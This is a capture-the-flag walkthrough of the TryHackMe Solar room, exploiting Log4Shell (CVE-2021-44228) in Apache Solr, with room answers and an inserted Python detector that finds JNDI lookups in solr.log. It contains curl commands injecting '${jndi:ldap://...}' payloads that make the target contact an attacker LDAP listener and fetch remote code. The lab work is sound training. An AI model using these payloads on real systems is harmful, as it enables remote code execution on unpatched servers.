CVE-2021-44228 Apache Solr 8.11.1

Exploiting log4j
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ nmap solar.thm -p- -sC -sV

What service is running on port 8983? (Just the name of the software)

Apache Solr

Open the service running on port 8983 in your browser:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ firefox http://solar.thm:8983

What is the -Dsolr.log.dir argument set to, displayed on the front page?

/var/solr/logs

Which file contains this repeated entry? (Just the filename itself, no path needed)

solr.log

What “path” or URL endpoint is indicated in these repeated entries?

/admin/cores

Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

params

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.154.49:9999\}'
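
The log review above (solr.log, the /admin/cores path, the user-controlled params field) can be turned into a detection check. This is an added example, not part of the original walkthrough: the log lines are constructed in the general layout of Solr request entries, and the function name `find_jndi_params` is hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (timestamps and thread names are made up);
# the callback addresses are the ones used in this walkthrough.
SAMPLE_LOG = """\
2021-12-13 03:47:53.989 INFO  (qtp1083962448-21) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={} status=0 QTime=0
2021-12-13 03:48:10.112 INFO  (qtp1083962448-19) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://10.8.154.49:9999}} status=0 QTime=1
2021-12-13 03:49:02.431 INFO  (qtp1083962448-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=%24%7Bjndi%3Aldap%3A%2F%2F10.10.82.86%3A1389%2FExploit%7D} status=0 QTime=0
2021-12-13 03:50:15.007 INFO  (qtp1083962448-20) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json} status=0 QTime=0
"""

# Greedy match so a value that itself contains "}" stays inside params.
REQUEST = re.compile(r"path=(?P<path>\S+) params=\{(?P<params>.*)\} status=")
# Matches only the literal lookup form shown on this page.
JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<endpoint>[^/}\s]+)", re.I)


def find_jndi_params(log_text):
    """Return one finding per request parameter that carries a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        req = REQUEST.search(line)
        if not req:
            continue
        for pair in req.group("params").split("&"):
            # Decode first: the value may be logged raw or percent-encoded.
            decoded = unquote(pair)
            hit = JNDI.search(decoded)
            if hit:
                findings.append({
                    "line": lineno,
                    "path": req.group("path"),
                    "param": decoded.partition("=")[0],
                    "scheme": hit.group("scheme").lower(),
                    "endpoint": hit.group("endpoint"),  # host:port contacted
                })
    return findings


if __name__ == "__main__":
    for f in find_jndi_params(SAMPLE_LOG):
        print(f"solr.log line {f['line']}: {f['path']} param '{f['param']}' "
              f"-> {f['scheme']}://{f['endpoint']}")
```

The extracted endpoints are the hosts to look for in outbound firewall or proxy logs when triaging a hit.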

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Listening on 0.0.0.0:1389

curl 'http://10.10.29.51:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.82.86:1389/Exploit\}'
python3 -m http.server

What is the full path of the specific solr.in.sh file?

/etc/default/solr.in.sh

https://tryhackme.com/room/solar
